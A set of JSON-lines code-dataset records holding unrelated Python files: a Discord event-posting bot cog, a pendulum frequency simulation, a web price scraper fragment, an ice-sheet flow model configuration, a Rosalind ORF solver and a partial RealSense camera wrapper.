+{"seq_id":"355491413","text":"import discord\nimport logging\n\nfrom typing import Union, Optional\n\nfrom redbot.core import commands, checks, Config, VersionInfo, version_info\nfrom redbot.core.utils.predicates import ReactionPredicate\nfrom redbot.core.utils.menus import start_adding_reactions\nfrom redbot.core.utils.chat_formatting import pagify, humanize_list\n\nfrom .event_obj import Event, ValidImage\n\nlog = logging.getLogger(\"red.trusty-cogs.EventPoster\")\n\nEVENT_EMOJIS = [\n    \"\\N{WHITE HEAVY CHECK MARK}\",\n    \"\\N{NEGATIVE SQUARED CROSS MARK}\",\n    \"\\N{WHITE QUESTION MARK ORNAMENT}\",\n]\n\n\nclass EventPoster(commands.Cog):\n    \"\"\"Create admin approved events/announcements\"\"\"\n\n    __version__ = \"1.5.9\"\n    __author__ = \"TrustyJAID\"\n\n    def __init__(self, bot):\n        self.bot = bot\n        self.config = Config.get_conf(self, identifier=144014746356678656)\n        default_guild = {\n            \"approval_channel\": None,\n            \"announcement_channel\": None,\n            \"ping\": \"\",\n            \"events\": {},\n            \"custom_links\": {},\n            \"default_max\": None,\n            \"auto_end_events\": False,\n        }\n        default_user = {\"player_class\": \"\"}\n        self.config.register_guild(**default_guild)\n        self.config.register_member(**default_user)\n        self.event_cache = {}\n        self.bot.loop.create_task(self.initialize())\n\n    def format_help_for_context(self, ctx: commands.Context):\n        \"\"\"\n        Thanks Sinbad!\n        \"\"\"\n        pre_processed = super().format_help_for_context(ctx)\n        return f\"{pre_processed}\\n\\nCog Version: {self.__version__}\"\n\n    async def initialize(self) -> None:\n        if version_info >= VersionInfo.from_str(\"3.2.0\"):\n            await self.bot.wait_until_red_ready()\n        else:\n            await self.bot.wait_until_ready()\n        try:\n            for guild_id in await self.config.all_guilds():\n                guild = self.bot.get_guild(int(guild_id))\n                if guild_id not in self.event_cache:\n                    self.event_cache[guild_id] = {}\n                if guild is None:\n                    continue\n                data = await self.config.guild(guild).events()\n                for user_id, event_data in data.items():\n                    try:\n                        event = await Event.from_json(event_data, guild)\n                    except (TypeError, KeyError, discord.errors.Forbidden):\n                        log.error(\"Error loading events\", exc_info=True)\n                        continue\n                    if event is None:\n                        return\n                    self.event_cache[guild_id][event.message.id] = event\n        except Exception as e:\n            log.error(\"Error loading events\", exc_info=e)\n\n    @commands.Cog.listener()\n    async def on_raw_reaction_add(self, payload: discord.RawReactionActionEvent) -> None:\n        \"\"\"\n        Checks for reactions to the event\n        \"\"\"\n        if str(payload.emoji) not in EVENT_EMOJIS:\n            # log.debug(\"Not a valid yes or no emoji\")\n            return\n        if payload.guild_id not in self.event_cache:\n            return\n        if payload.message_id not in self.event_cache[payload.guild_id]:\n            return\n\n        guild = self.bot.get_guild(payload.guild_id)\n        user = guild.get_member(payload.user_id)\n        if user.bot:\n            return\n        event = self.event_cache[payload.guild_id][payload.message_id]\n        if str(payload.emoji) == \"\\N{WHITE HEAVY CHECK MARK}\":\n            await self.add_user_to_event(user, event)\n        if str(payload.emoji) == \"\\N{WHITE QUESTION MARK ORNAMENT}\":\n            await self.add_user_to_maybe(user, event)\n        if str(payload.emoji) == \"\\N{NEGATIVE SQUARED CROSS MARK}\":\n            if user == event.hoster:\n                async with self.config.guild(guild).events() as events:\n                    event = await Event.from_json(events[str(user.id)], guild)\n                    await event.message.edit(content=\"This event has ended.\")\n                    del events[str(user.id)]\n                    del self.event_cache[guild.id][event.message.id]\n                return\n            await self.remove_user_from_event(user, event)\n\n    @commands.Cog.listener()\n    async def on_raw_reaction_remove(self, payload: discord.RawReactionActionEvent) -> None:\n        \"\"\"\n        Checks for reactions to the event\n        \"\"\"\n        if str(payload.emoji) not in EVENT_EMOJIS:\n            # log.debug(\"Not a valid yes or no emoji\")\n            return\n        if payload.guild_id not in self.event_cache:\n            return\n        if payload.message_id not in self.event_cache[payload.guild_id]:\n            return\n\n        guild = self.bot.get_guild(payload.guild_id)\n        user = guild.get_member(payload.user_id)\n        if user.bot:\n            return\n        event = self.event_cache[payload.guild_id][payload.message_id]\n        event_members = [m[0] for m in event.members]\n        if str(payload.emoji) == \"\\N{WHITE HEAVY CHECK MARK}\":\n            if user == event.hoster:\n                return\n            if user not in event.maybe:\n                await self.remove_user_from_event(user, event)\n        if str(payload.emoji) == \"\\N{WHITE QUESTION MARK ORNAMENT}\":\n            if user == event.hoster:\n                return\n            if user not in event_members:\n                await self.remove_user_from_event(user, event)\n\n    async def add_user_to_event(\n        self, user: discord.Member, event: Event, player_class: Optional[str] = \"\"\n    ) -> None:\n        event_members = [m[0] for m in event.members]\n        if user in event_members:\n            return\n        if event.max_slots and len(event_members) >= event.max_slots:\n            return\n        if not player_class:\n            player_class = await self.config.member(user).player_class()\n        event.members.append((user, player_class))\n        if user in event.maybe:\n            event.maybe.remove(user)\n        ctx = await self.bot.get_context(event.message)\n        em = await self.make_event_embed(ctx, event)\n        await event.message.edit(embed=em)\n        async with self.config.guild(ctx.guild).events() as cur_events:\n            cur_events[str(event.hoster.id)] = event.to_json()\n        self.event_cache[ctx.guild.id][event.message.id] = event\n        return\n\n    async def add_user_to_maybe(\n        self, user: discord.Member, event: Event, player_class: Optional[str] = \"\"\n    ) -> None:\n        event_members = [m[0] for m in event.members]\n        if user in event.maybe:\n            return\n        event.maybe.append(user)\n        if user in event_members:\n            if not player_class:\n                player_class = await self.config.member(user).player_class()\n            event.members.remove((user, player_class))\n        ctx = await self.bot.get_context(event.message)\n        em = await self.make_event_embed(ctx, event)\n        await event.message.edit(embed=em)\n        async with self.config.guild(ctx.guild).events() as cur_events:\n            cur_events[str(event.hoster.id)] = event.to_json()\n        self.event_cache[ctx.guild.id][event.message.id] = event\n        return\n\n    async def remove_user_from_event(self, user: discord.Member, event: Event) -> None:\n        event_members = [m[0] for m in event.members]\n        if user in event_members:\n            for member, player_class in event.members:\n                if member == user:\n                    event.members.remove((member, player_class))\n            ctx = await self.bot.get_context(event.message)\n            em = await self.make_event_embed(ctx, event)\n            await event.message.edit(embed=em)\n            async with self.config.guild(ctx.guild).events() as cur_events:\n                cur_events[str(event.hoster.id)] = event.to_json()\n            self.event_cache[ctx.guild.id][event.message.id] = event\n        if user in event.maybe:\n            event.maybe.remove(user)\n            ctx = await self.bot.get_context(event.message)\n            em = await self.make_event_embed(ctx, event)\n            await event.message.edit(embed=em)\n            async with self.config.guild(ctx.guild).events() as cur_events:\n                cur_events[str(event.hoster.id)] = event.to_json()\n            self.event_cache[ctx.guild.id][event.message.id] = event\n\n    @commands.command(name=\"event\")\n    @commands.guild_only()\n    async def make_event(\n        self,\n        ctx: commands.Context,\n        members: commands.Greedy[discord.Member],\n        max_slots: Optional[int] = None,\n        *,\n        description: str,\n    ) -> None:\n        \"\"\"\n        Create an event\n\n        `[members...]` Add members already in the event you want to host.\n        `[max_slots=None]` Specify maximum number of Slots the event can have, default is no limit.\n        `<description>` provide a description for the event you're hosting.\n        With custom keyword links setup this will add an image to the events thumbnail\n        after being approved by an admin.\n        \"\"\"\n        approval_channel = ctx.guild.get_channel(\n            await self.config.guild(ctx.guild).approval_channel()\n        )\n        announcement_channel = ctx.guild.get_channel(\n            await self.config.guild(ctx.guild).announcement_channel()\n        )\n        if not approval_channel:\n            return await ctx.send(\"No admin channel has been setup on this server.\")\n        if not announcement_channel:\n            return await ctx.send(\"No announcement channel has been setup on this server.\")\n        if str(ctx.author.id) in await self.config.guild(ctx.guild).events():\n            if not await self.check_clear_event(ctx):\n                return\n        if ctx.author not in members:\n            members.insert(0, ctx.author)\n        member_list = []\n        for member in members:\n            member_list.append((member, await self.config.member(member).player_class()))\n\n        if not max_slots:\n\n            max_slots = await self.config.guild(ctx.guild).default_max()\n            # log.debug(f\"using default {max_slots}\")\n        event = Event(\n            hoster=ctx.author, members=list(member_list), event=description, max_slots=max_slots\n        )\n        em = await self.make_event_embed(ctx, event)\n        admin_msg = await approval_channel.send(embed=em)\n        start_adding_reactions(admin_msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n        pred = ReactionPredicate.yes_or_no(admin_msg)\n        reaction, user = await ctx.bot.wait_for(\"reaction_add\", check=pred)\n        if pred.result:\n            ping = await self.config.guild(ctx.guild).ping()\n            event.approver = user\n            event.channel = announcement_channel\n            em.set_footer(text=f\"Approved by {user}\", icon_url=user.avatar_url)\n            posted_message = await announcement_channel.send(ping, embed=em)\n            event.message = posted_message\n            async with self.config.guild(ctx.guild).events() as cur_events:\n                cur_events[str(event.hoster.id)] = event.to_json()\n            if ctx.guild.id not in self.event_cache:\n                self.event_cache[ctx.guild.id] = {}\n            self.event_cache[ctx.guild.id][posted_message.id] = event\n            try:\n                start_adding_reactions(posted_message, EVENT_EMOJIS)\n            except discord.errors.Forbidden:\n                pass\n        else:\n            await ctx.send(f\"{ctx.author.mention}, your event request was denied by an admin.\")\n            await admin_msg.delete()\n        return\n\n    @commands.command(name=\"clearevent\", aliases=[\"endevent\"])\n    @commands.guild_only()\n    @commands.bot_has_permissions(embed_links=True)\n    async def clear_event(self, ctx: commands.Context, clear: bool = False) -> None:\n        \"\"\"\n        Delete a stored event so you can create more\n\n        `[clear]` yes/no to clear your current running event.\n        \"\"\"\n        if str(ctx.author.id) not in await self.config.guild(ctx.guild).events():\n            return await ctx.send(\"You don't have any events running.\")\n        elif not clear:\n            event_data = await self.config.guild(ctx.guild).events()\n            event = await Event.from_json(event_data[str(ctx.author.id)], ctx.guild)\n            if not event:\n                async with self.config.guild(ctx.guild).events() as events:\n                    # clear the broken event\n                    del events[str(ctx.author.id)]\n                del self.event_cache[ctx.guild.id][event.message.id]\n                return await ctx.send(\"You don't have any events running.\")\n            em = await self.make_event_embed(ctx, event)\n            return await ctx.send(\n                (\n                    f\"{ctx.author.display_name}, you're currently hosting. \"\n                    f\"Type `{ctx.prefix}clearevent yes` to clear it.\"\n                ),\n                embed=em,\n            )\n        else:\n            async with self.config.guild(ctx.guild).events() as events:\n                event = await Event.from_json(events[str(ctx.author.id)], ctx.guild)\n                await event.message.edit(content=\"This event has ended.\")\n                del events[str(ctx.author.id)]\n                del self.event_cache[ctx.guild.id][event.message.id]\n            await ctx.tick()\n\n    @commands.command(name=\"showevent\")\n    @commands.guild_only()\n    @commands.bot_has_permissions(embed_links=True)\n    async def show_event(self, ctx: commands.Context, member: discord.Member = None) -> None:\n        \"\"\"Show current event being run by a member\"\"\"\n        if not member:\n            member = ctx.author\n        if str(member.id) not in await self.config.guild(ctx.guild).events():\n            return await ctx.send(f\"{member} does not have any events running.\")\n        event_data = await self.config.guild(ctx.guild).events()\n        event = await Event.from_json(event_data[str(member.id)], ctx.guild)\n        if not event:\n            async with self.config.guild(ctx.guild).events() as events:\n                # clear the broken event\n                del events[str(ctx.author.id)]\n            del self.event_cache[ctx.guild.id][event.message.id]\n            return await ctx.send(\n                f\"{member.display_name} is not currently hosting an event.\"\n            )\n        em = await self.make_event_embed(ctx, event)\n        await ctx.send(\n            (\n                f\"{member.display_name} is currently hosting. \"\n                f\"Type `{ctx.prefix}clearevent yes` to clear it.\"\n            ),\n            embed=em,\n        )\n\n    @commands.command(name=\"join\")\n    @commands.guild_only()\n    async def join_event(\n        self, ctx: commands.Context, hoster: discord.Member, *, player_class: Optional[str] = None,\n    ) -> None:\n        \"\"\"Join an event being hosted\"\"\"\n        if str(hoster.id) not in await self.config.guild(ctx.guild).events():\n            return await ctx.send(\"That user is not currently hosting any events.\")\n        event_data = await self.config.guild(ctx.guild).events()\n        event = await Event.from_json(event_data[str(hoster.id)], ctx.guild)\n        if not event:\n            async with self.config.guild(ctx.guild).events() as events:\n                # clear the broken event\n                del events[str(ctx.author.id)]\n            del self.event_cache[ctx.guild.id][event.message.id]\n            return await ctx.send(\"That user is not currently hosting any events.\")\n        event_members = [m[0] for m in event.members]\n        if ctx.author in event_members:\n            return await ctx.send(\"You're already participating in this event!\")\n        await self.add_user_to_event(ctx.author, event, player_class)\n        await ctx.tick()\n\n    @commands.command(name=\"leaveevent\")\n    @commands.guild_only()\n    async def leave_event(self, ctx: commands.Context, hoster: discord.Member) -> None:\n        \"\"\"Leave an event being hosted\"\"\"\n        if str(hoster.id) not in await self.config.guild(ctx.guild).events():\n            return await ctx.send(\"That user is not currently hosting any events.\")\n        event_data = await self.config.guild(ctx.guild).events()\n        event = await Event.from_json(event_data[str(hoster.id)], ctx.guild)\n        if not event:\n            async with self.config.guild(ctx.guild).events() as events:\n                # clear the broken event\n                del events[str(ctx.author.id)]\n            del self.event_cache[ctx.guild.id][event.message.id]\n            return await ctx.send(\"That user is not currently hosting any events.\")\n        event_members = [m[0] for m in event.members]\n        if ctx.author not in event_members:\n            return await ctx.send(\"You're not participating in this event!\")\n        await self.remove_user_from_event(ctx.author, event)\n        await ctx.tick()\n\n    @commands.command(name=\"removefromevent\")\n    @commands.guild_only()\n    async def remove_from_event(\n        self, ctx: commands.Context, member: discord.Member, hoster: discord.Member = None\n    ) -> None:\n        \"\"\"\n        Remove a user from an event you're hosting\n\n        `<member>` The member to remove from your event\n        `<hoster>` mod/admin only to specify whose event to remove a user from.\n        \"\"\"\n        if hoster and not await self.is_mod_or_admin(ctx.author):\n            return await ctx.send(\"You cannot remove a member from someone elses event\")\n        if not hoster:\n            hoster = ctx.author\n        if member is hoster:\n            return await ctx.send(\"You cannot remove the hoster from this event.\")\n        if str(hoster.id) not in await self.config.guild(ctx.guild).events():\n            return await ctx.send(\"You are not currently hosting any events.\")\n        event_data = await self.config.guild(ctx.guild).events()\n        event = await Event.from_json(event_data[str(ctx.author.id)], ctx.guild)\n        if not event:\n            async with self.config.guild(ctx.guild).events() as events:\n                # clear the broken event\n                del events[str(ctx.author.id)]\n            del self.event_cache[ctx.guild.id][event.message.id]\n            return await ctx.send(\"That user is not currently hosting any events.\")\n        event_members = [m[0] for m in event.members]\n        if member not in event_members:\n            return await ctx.send(\"That member is not participating in that event!\")\n        await self.remove_user_from_event(member, event)\n        await ctx.tick()\n\n    async def is_mod_or_admin(self, member: discord.Member) -> bool:\n        guild = member.guild\n        if member == guild.owner:\n            return True\n        if await self.bot.is_owner(member):\n            return True\n        if await self.bot.is_admin(member):\n            return True\n        if await self.bot.is_mod(member):\n            return True\n        return False\n\n    async def make_event_embed(self, ctx: commands.Context, event: Event) -> discord.Embed:\n        em = discord.Embed(title=event.event)\n        em.set_author(name=f\"{event.hoster} is hosting\", icon_url=event.hoster.avatar_url)\n        try:\n            prefixes = await self.bot.get_valid_prefixes(ctx.guild)\n            prefix = prefixes[0]\n        except AttributeError:\n            prefixes = await self.bot.get_prefix(ctx.message)\n            prefix = prefixes[0]\n        max_slots_msg = \"\"\n        if event.max_slots:\n            slots = event.max_slots - len(event.members)\n            if slots < 0:\n                slots = 0\n            max_slots_msg = f\"**{slots} slots available.**\"\n        em.description = (\n            f\"To join this event type `{prefix}join {event.hoster}`\" f\"\\n\\n{max_slots_msg}\"\n        )\n        player_list = \"\"\n        for i, member in enumerate(event.members):\n            player_class = \"\"\n            if member[1]:\n                player_class = f\" - {member[1]}\"\n            player_list += f\"**Slot {i+1}**\\n{member[0].mention}{player_class}\\n\"\n        for page in pagify(player_list, shorten_by=1024):\n            em.add_field(name=\"Attendees\", value=page)\n        if event.maybe and len(em.fields) < 25:\n            em.add_field(name=\"Maybe\", value=humanize_list([m.mention for m in event.maybe]))\n        if event.approver:\n            em.set_footer(text=f\"Approved by {event.approver}\", icon_url=event.approver.avatar_url)\n        thumbnails = await self.config.guild(ctx.guild).custom_links()\n        for name, link in thumbnails.items():\n            if name.lower() in event.event.lower():\n                em.set_thumbnail(url=link)\n        return em\n\n    async def check_clear_event(self, ctx: commands.Context) -> bool:\n        msg = await ctx.send(\"You already have an event running, would you like to cancel it?\")\n        start_adding_reactions(msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n        pred = ReactionPredicate.yes_or_no(msg, ctx.author)\n        await ctx.bot.wait_for(\"reaction_add\", check=pred)\n        return pred.result\n\n    @commands.group(name=\"eventset\")\n    @commands.guild_only()\n    async def event_settings(self, ctx: commands.Context) -> None:\n        \"\"\"Manage server specific settings for events\"\"\"\n        pass\n\n    @event_settings.command(name=\"playerclass\")\n    @commands.guild_only()\n    async def set_default_player_class(\n        self, ctx: commands.Context, *, player_class: str = \"\"\n    ) -> None:\n        \"\"\"\n        Sets the user's default player class. If nothing is provided this will be reset.\n\n        If the user has set this and does not provide a `player_class` in the join command,\n        this setting will be used.\n        \"\"\"\n        await self.config.member(ctx.author).player_class.set(player_class)\n        if player_class:\n            await ctx.send(\n                \"Your player class has been set to {player_class}\".format(\n                    player_class=player_class\n                )\n            )\n        else:\n            await ctx.send(\"Your player class has been reset.\")\n\n    @event_settings.command(name=\"defaultmax\", aliases=[\"max\"])\n    @checks.mod_or_permissions(manage_messages=True)\n    @commands.guild_only()\n    async def set_default_max_slots(\n        self, ctx: commands.Context, default_max: Optional[int] = None\n    ) -> None:\n        \"\"\"\n        Sets the server's default maximum slots\n\n        This can be useful for defining the maximum number of slots allowed for an event.\n        \"\"\"\n        await self.config.guild(ctx.guild).default_max.set(default_max)\n        await ctx.send(\n            \"Default maximum slots for events set to {default_max} slots.\".format(\n                default_max=default_max\n            )\n        )\n\n    @event_settings.command(name=\"channel\")\n    @checks.mod_or_permissions(manage_messages=True)\n    @commands.guild_only()\n    async def set_channel(\n        self, ctx: commands.Context, channel: discord.TextChannel = None\n    ) -> None:\n        \"\"\"\n        Set the Announcement channel for events\n\n        Providing no channel will clear the channel.\n        \"\"\"\n        if channel and not channel.permissions_for(ctx.me).embed_links:\n            return await ctx.send(\"I require `Embed Links` permission to use that channel.\")\n        save_channel = None\n        reply = \"Announcement channel \"\n        if channel:\n            save_channel = channel.id\n            reply += \"set to {chan}\".format(chan=channel.mention)\n            await self.config.guild(ctx.guild).announcement_channel.set(save_channel)\n        else:\n            reply += \"cleared.\"\n            await self.config.guild(ctx.guild).announcement_channel.clear()\n        await ctx.send(reply)\n\n    @event_settings.command(name=\"approvalchannel\")\n    @checks.mod_or_permissions(manage_messages=True)\n    @commands.guild_only()\n    async def set_approval_channel(\n        self, ctx: commands.Context, channel: discord.TextChannel = None\n    ) -> None:\n        \"\"\"\n        Set the admin approval channel\n\n        Providing no channel will clear the channel.\n        \"\"\"\n        if channel and not channel.permissions_for(ctx.me).embed_links:\n            return await ctx.send(\"I require `Embed Links` permission to use that channel.\")\n        if channel and not channel.permissions_for(ctx.me).add_reactions:\n            return await ctx.send(\"I require `Add Reactions` permission to use that channel.\")\n        save_channel = None\n        reply = \"Admin approval channel \"\n        if channel:\n            save_channel = channel.id\n            reply += \"set to {chan}.\".format(chan=channel.mention)\n            await self.config.guild(ctx.guild).approval_channel.set(save_channel)\n        else:\n            await self.config.guild(ctx.guild).approval_channel.clear()\n            reply += \"cleared.\"\n\n        await ctx.send(reply)\n\n    @event_settings.command(name=\"links\")\n    @checks.mod_or_permissions(manage_messages=True)\n    @commands.guild_only()\n    async def set_custom_link(self, ctx: commands.Context, keyword: str, link: ValidImage) -> None:\n        \"\"\"\n        Set the custom thumbnail for events\n\n        `<keyword>` is the word that will be searched for in event titles.\n        `<link>` needs to be an image link to be used for the thumbnail when the keyword\n        is found in the event title.\n        \"\"\"\n        async with self.config.guild(ctx.guild).custom_links() as custom_links:\n            if keyword.lower() not in custom_links:\n                custom_links[keyword.lower()] = link\n        await ctx.tick()\n\n    @event_settings.command(name=\"ping\", aliases=[\"mention\"])\n    @checks.mod_or_permissions(manage_messages=True)\n    @commands.guild_only()\n    async def set_ping(self, ctx: commands.Context, *roles: Union[discord.Role, str]) -> None:\n        \"\"\"\n        Set the ping to use when an event is announced\n\n        `[roles...]` is a space separated list of roles to be pinged when an announcement\n        is made. Use `here` or `everyone` if you want to ping that specific group of people.\n        \"\"\"\n        msg = \", \".join(r.mention for r in roles if type(r) == discord.Role)\n        msg += \", \".join(f\"@{r}\" for r in roles if r in [\"here\", \"everyone\"])\n        await self.config.guild(ctx.guild).ping.set(msg)\n        await ctx.tick()\n","sub_path":"eventposter/eventposter.py","file_name":"eventposter.py","file_ext":"py","file_size_in_byte":26189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"391404011","text":"import numpy as np\nimport math as m\nimport matplotlib.pyplot as plt\nfrom methodes import *\n\ng = 9.81\nt0 = 0.\ntf = 10.\neps = 10E-1\nl = 1\n\ndef eq_psimple():\n    \"\"\" Modelise l'equation du mouvement du pendule simple\"\"\"\n    return lambda X, t: np.array([X[1], (-g/l) * np.sin(X[0])])\n\ndef freq_psimple(theta):\n    \"\"\"Calcule la frequence du pendule simple pour un angle theta fourni en parametre\"\"\"\n    y0 = np.array([theta, 0.])\n    res = meth_epsilon(y0, t0, tf, eps, eq_psimple(), \"rk4\")\n    \n    i = 0\n    deb_variation = abs(res[1][0] - res[0][0]) / (res[1][0] - res[0][0])\n    variation = deb_variation\n    while( (abs(res[i][1]) > eps or variation == deb_variation) and i < len(res)-1 ):\n        i += 1\n        variation = abs(res[i+1][0] - res[i][0]) / (res[i+1][0] - res[i][0])\n\n    return 1/(t0 + i*eps)\n\ndef tracer_freq(min_theta, max_theta):\n    \"\"\"Trace la frequence du pendule simple de longueur l \n    en fonction de l'angle theta, entre min_theta et max_theta\"\"\"\n    theta = np.arange(min_theta, max_theta, 10E-2)\n\n    y = []\n    for i in range(len(theta)):\n        y = y + [freq_psimple(theta[i])]\n\n    u = plt.plot(theta, y, linewidth=1.0)\n    plt.xlabel(\"Theta\")\n    plt.ylim(0,0.6)\n    plt.ylabel(\"Frequence\")\n    plt.show()\n\ndef pos_simple(theta):\n    \"\"\"On resout l'equation differentielle\"\"\"\n    y0 = np.array([theta,0.])\n    plt.clf()\n    nmax = 300\n    y1 = []\n    y2 = []\n    res = meth_epsilon(y0, t0, tf, 10E-3, eq_psimple(), \"rk4\")\n    x = np.arange(t0, tf, (tf - t0)/len(res))\n    for i in range(len(res)):\n        y1 = y1 + [res[i][0]]\n        y2 = y2 + [res[i][1]]\n    u = plt.plot(x, y1, linewidth=1.0)\n    v = plt.plot(x, y2, linewidth=1.0)\n    plt.legend((u,v),(\"Theta\",\"Omega\"))\n    plt.show()\n\n\n########### TESTS ###########\n\n#tracer_freq(np.pi/20, np.pi/4)\n#pos_simple(np.pi/10)\n","sub_path":"pendule_simple.py","file_name":"pendule_simple.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
element.text.strip()\nprint(string_price)\n","sub_path":"Section5-2019PriceAlertsOnlineWebStore/76-FindPriceWebsite/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336294591","text":"import sys\nsrc_directory = '../../../'\nsys.path.append(src_directory)\n\nimport src.model\nimport src.solvers\nimport src.physical_constants\nimport pylab\nimport dolfin\n\ndolfin.set_log_active(True)\n\ntheta = pylab.deg2rad(-3.0)\nL = 100000.\nH = 1000.0\na0 = 100\nsigma = 10000\n\nclass Surface(dolfin.Expression):\n def __init__(self):\n pass\n def eval(self,values,x):\n values[0] = pylab.sin(theta)/pylab.cos(theta)*x[0]\n\nclass Bed(dolfin.Expression):\n def __init__(self):\n pass\n def eval(self,values,x):\n y_0 = -H + a0*(pylab.exp(-((x[0]-L/2.)**2 + (x[1]-L/2.)**2)/sigma**2))\n values[0] = pylab.sin(theta)*(x[0] + pylab.sin(theta)*y_0)/pylab.cos(theta) + pylab.cos(theta)*y_0\n\nclass SMB(dolfin.Expression):\n def eval(self,values,x):\n values[0] = 0.0\n\nnonlin_solver_params = src.helper.default_nonlin_solver_params()\nnonlin_solver_params['newton_solver']['relaxation_parameter'] = 1.0\nnonlin_solver_params['newton_solver']['relative_tolerance'] = 1.0\nnonlin_solver_params['newton_solver']['linear_solver'] = 'gmres'\nnonlin_solver_params['newton_solver']['preconditioner'] = 'hypre_amg'\n\nconfig = { 'mode' : 'transient',\n 'coupled' : \n { 'on' : False,\n 'inner_tol': 0.0,\n 'max_iter' : 1\n },\n 't_start' : 0.0,\n 't_end' : 500.0,\n 'time_step' : 2.0,\n 'velocity' : \n { 'on' : True,\n 'newton_params' : nonlin_solver_params,\n 'viscosity_mode' : 'isothermal',\n 'b_linear' : None,\n 'use_T0': False,\n 'T0' : None,\n 'A0' : 2.140373e-7,\n 'beta2' : (1*2.140373e-7*1000)**-1.,\n 'r' : 0.0,\n 'E' : 1,\n 'approximation' : 'fo',\n 'boundaries' : None\n },\n 'enthalpy' : \n { 'on': False,\n 'use_surface_climate': False,\n 'T_surface' : None,\n \n },\n 'free_surface' :\n { 'on': True,\n 'lump_mass_matrix': False,\n 'use_shock_capturing' : False,\n 'thklim': 10.0,\n 'use_pdd': False,\n 'observed_smb': SMB(),\n 'static_boundary_conditions': False\n }, \n 'age' : \n { 'on': False,\n 'use_smb_for_ela': False,\n 'ela': None,\n },\n 'surface_climate' : \n { 'on': False,\n 'T_ma': None,\n 'T_ju': None,\n 'beta_w': None,\n 'sigma': None,\n 'precip': None\n },\n 'adjoint' :\n { 'alpha' : None,\n 'beta' : None,\n 'max_fun' : None,\n 'objective_function' : 'logarithmic',\n 'animate' : False\n },\n 'output_path' : './results/',\n 'wall_markers' : [],\n 'periodic_boundary_conditions' : True,\n 'log': True }\n\nmodel = src.model.Model()\nmodel.set_geometry(Surface(), Bed())\n\nnx = 50\nny = 50\nnz = 7\n\nmodel.generate_uniform_mesh(nx,ny,nz,xmin=0,xmax=L,ymin=0,ymax=L,generate_pbcs = True)\n\nmodel.set_parameters(src.physical_constants.IceParameters())\n\nmodel.initialize_variables()\nmodel.n = 1.0\nmodel.calculate_boundaries()\n\nT = src.solvers.TransientSolver(model,config)\nT.solve()\n\ndolfin.File('./results_stokes/u.xml') << model.u\ndolfin.File('./results_stokes/v.xml') << model.v\ndolfin.File('./results_stokes/w.xml') << model.w\ndolfin.File('./results_stokes/S.xml') << model.S\n\n","sub_path":"simulations/ISMIP-HOM/F/ISMIP_HOM_F_slip.py","file_name":"ISMIP_HOM_F_slip.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"614250063","text":"'''\r\nCreated on Mar 15, 2013\r\n\r\n@author: 
Zoya\r\n'''\r\nfrom com.zobar.rosalind.PROT import RNAcodon\r\nfrom com.zobar.rosalind.RNA import convertDNAtoRNAfromFile\r\nfrom com.zobar.rosalind.REVC import REVCfromFile\r\nimport os\r\n\r\nfrom com.zobar.rosalind.rosalind_utils import get_fasta_dna_list\r\n\r\ndef orf(file_name, output_file_name):\r\n    dna_list = get_fasta_dna_list(open(file_name))\r\n    with open(file_name, 'w') as file_dna:\r\n        file_dna.write(dna_list[0].dna)\r\n    \r\n    temp_rna_file = \"data/temp_rna.txt\"\r\n    convertDNAtoRNAfromFile(file_name, temp_rna_file)\r\n    temp_rna_revc_file = \"data/temp_rna_revc.txt\"\r\n    REVCfromFile(file_name, temp_rna_revc_file)\r\n    convertDNAtoRNAfromFile(temp_rna_revc_file, temp_rna_revc_file)\r\n    \r\n    proteins = set(get_proteins(temp_rna_file) + get_proteins(temp_rna_revc_file))\r\n    \r\n    with open(output_file_name, 'w') as proteins_file:\r\n        proteins_file.write(\"\\n\".join(proteins))\r\n    \r\n    os.remove(temp_rna_file)\r\n    os.remove(temp_rna_revc_file)\r\n    \r\ndef get_proteins(file_name):\r\n    result = []\r\n    with open(file_name) as rna:\r\n        codon = rna.read(3)\r\n        frames = [[] for tuit in range(3)]\r\n        k = rna.read(1)\r\n        i = 0\r\n        while k:\r\n            codon = codon[1:] + k\r\n            if RNAcodon[codon] == 'Stop':\r\n                result.extend(frames[i % 3])\r\n                frames[i % 3] = []\r\n            else:\r\n                for j, protein in enumerate(frames[i % 3]):\r\n                    frames[i % 3][j] = protein + RNAcodon[codon]\r\n                if RNAcodon[codon] == 'M':\r\n                    frames[i % 3].append(RNAcodon[codon])\r\n            k = rna.read(1)\r\n            i = i + 1\r\n    return result\r\n\r\norf(\"data/rosalind_orf.txt\", \"data/rosalind_orf_result.txt\")\r\n","sub_path":"src/com/zobar/rosalind/ORF.py","file_name":"ORF.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"120985006","text":"import cv2 as cv\nimport numpy as np\n\nfrom r200 import R200Frame\n\nclass IntelCamera:\n    \n    # Loading of both realsense libraries\n    try:\n        import pyrealsense as pyrs\n        pyrealsense1 = True\n    except:\n        pyrealsense1 = False\n\n    try:\n        import pyrealsense2 as rs\n        pyrealsense2 = True\n    except:\n        pyrealsense2 = False\n    \n    \n    def __init__(self, cameraType):\n        \n        self.r200 = False\n        self.d400 = False\n        \n        # Choose camera with libraries installed\n        if not (self.pyrealsense1 or self.pyrealsense2):\n            print('No library for pyrealsense found')\n        \n        if cameraType.lower() == 'r200' and self.pyrealsense1:\n            self.r200 = True\n        \n        if cameraType.lower() == 'd400' and self.pyrealsense2:\n            self.d400 = True\n        \n        if not (self.r200 or self.d400):\n            print(\"Camera {} doesn't have library installed\".format(cameraType))\n    \n    def InitialiseStreams(self, depth_width, depth_height, color_width, color_height, fps, custom_options = []):\n        \n        if self.r200:\n            \n            try:\n                # Configure depth and color streams\n                depth_stream = self.pyrs.stream.DepthStream(width=depth_width, height=depth_height, fps=fps)\n                color_stream = self.pyrs.stream.ColorStream(width=color_width, height=color_height, fps=fps)\n                stream_list = [depth_stream, color_stream]\n\n                # Start streaming\n                self.serv = self.pyrs.Service()\n                self.dev = self.serv.Device(streams=stream_list)\n\n                if len(custom_options) != 0:\n                    try:\n                        